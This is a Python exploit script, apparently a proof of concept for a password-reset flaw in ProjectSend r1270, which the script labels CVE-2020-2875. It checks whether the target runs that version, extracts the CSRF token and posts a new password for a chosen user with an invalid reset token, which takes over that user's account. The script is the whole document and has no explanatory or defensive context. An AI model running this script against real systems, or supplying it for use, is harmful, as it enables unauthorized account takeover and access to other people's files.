import requests import argparse import re proxies = {"http":None,"https":None} def check(): session = requests.Session() r = session.get(url,proxies=proxies,verify=False) if (r.text.find('version r1270')> 0): print("The application is vulnerable") else: print("The application may not be vulnerable") return session def getCSRFtoken(session): r = session.get(url,proxies=proxies,verify=False) m = re.search(" +name=\"csrf_token\" value=\"(.*?)\"",r.text) return m.group(1) def exploit(session): target = url +"/reset-password.php?user={}&token=NotValid".format(user) csrfToken = getCSRFtoken(session) data = {"csrf_token":csrfToken,"form_type":"new_password","password":pwd} r = session.post(target,data=data,proxies=proxies,verify=False) if(r.text.find("Your new password has been set. You can now log in using it.")>0): print("Sucess!!") else: print("Fail!!!") def main(): parser = argparse.ArgumentParser(description='CVE-2020-2875: ProjectSend r1270 Privilage Escalation') parser.add_argument('--url',type=str,help='The url address of the ProjectSend app',required=True) parser.add_argument('--user',type=str,help='The user name target of the app',required=True) parser.add_argument('--pwd',type=str,help='The new password to set',required=True) parser.add_argument('--proxy',type=str,help="The proxy to be use in format IP:PORT By default None",required=False) args = parser.parse_args() global url global user global pwd global proxies url = args.url user = args.user pwd = args.pwd if args.proxy is not None: proxies={"http":"http://{}".format(args.proxy),"https":"https://{}".format(args.proxy)} regex = re.compile( r'^(?:http)s?://' # http:// or https:// r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain... r'localhost|' #localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip r'(?::\d+)?' # optional port r'(?:/?|[/?]\S+)$', re.IGNORECASE) if (re.match(regex, url) is None): print("The provided url is not valid!") exit() session = check() exploit(session) if __name__ == "__main__": main()